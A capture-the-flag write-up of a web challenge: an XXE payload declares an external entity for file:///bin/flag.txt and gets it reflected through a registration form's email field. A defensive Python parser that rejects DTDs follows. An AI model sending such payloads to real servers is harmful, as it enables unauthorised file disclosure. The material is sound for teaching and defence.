Category
Web
Description
Can you read the flag at /bin/flag.txt?
Solution
Entering the page we get a registration form.
Submitting some data in the form just returns an error message.
Sorry, t1@te.com is already registered!
Taking a look at the request, we can see that it’s an XML request.
POST /process.php HTTP/1.1
Host: 3.15.157.157
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 192
Origin: http://3.15.157.157
DNT: 1
Connection: close
Referer: http://3.15.157.157/
Sec-GPC: 1

<?xml version="1.0" encoding="UTF-8"?>
<root><name>t1</name><tel>1</tel><email>t1@te.com</email><password>12</password></root>
Since the email value is reflected in the error message, we might be able to print the flag using XXE and the email tag.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY file SYSTEM "file:///bin/flag.txt"> ]>
<root><name>t1</name><tel>1</tel><email>&file;</email><password>12</password></root>
Now we get the flag in the response.
Sorry, ASV{XML_1S_0LD_4ND_B4D}
is already registered!
ASV{XML_1S_0LD_4ND_B4D}
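The flag comes back because the server expands an entity declared in the request's DOCTYPE into the reflected email field. As an added example (not part of the challenge, whose process.php source is not shown), here is a Python parser for the same registration document that refuses any DOCTYPE or entity declaration before reading a field; parse_registration, ForbiddenXML and the constant names are chosen for illustration.

```python
from xml.parsers import expat

# Constructed sample bodies, copied from the two requests shown in the write-up.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
          b'<root><name>t1</name><tel>1</tel><email>t1@te.com</email>'
          b'<password>12</password></root>')
WITH_DOCTYPE = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
                b'<!DOCTYPE replace [<!ENTITY file SYSTEM "file:///bin/flag.txt"> ]>\n'
                b'<root><name>t1</name><tel>1</tel><email>&file;</email>'
                b'<password>12</password></root>')
FIELDS = ("name", "tel", "email", "password")


class ForbiddenXML(ValueError):
    """The body carries a DOCTYPE or entity declaration."""


def parse_registration(body: bytes) -> dict:
    """Return the form fields under <root>, rejecting DTDs outright."""
    fields, stack = {}, []

    def forbid(*_args):
        # Fires on "<!DOCTYPE" or "<!ENTITY", before any entity is resolved.
        raise ForbiddenXML("DOCTYPE and entity declarations are not accepted")

    def start(tag, _attrs):
        stack.append(tag)
        if len(stack) == 2 and stack[0] == "root" and tag in FIELDS:
            fields[tag] = ""

    def text(data):
        # Only collect text that sits directly inside a known field element.
        if len(stack) == 2 and stack[1] in fields:
            fields[stack[1]] += data

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid
    parser.EntityDeclHandler = forbid
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda _tag: stack.pop()
    parser.CharacterDataHandler = text
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    return fields
```

A registration form has no legitimate need for a DTD, so rejecting the declaration is simpler and safer than trying to filter entity values after parsing.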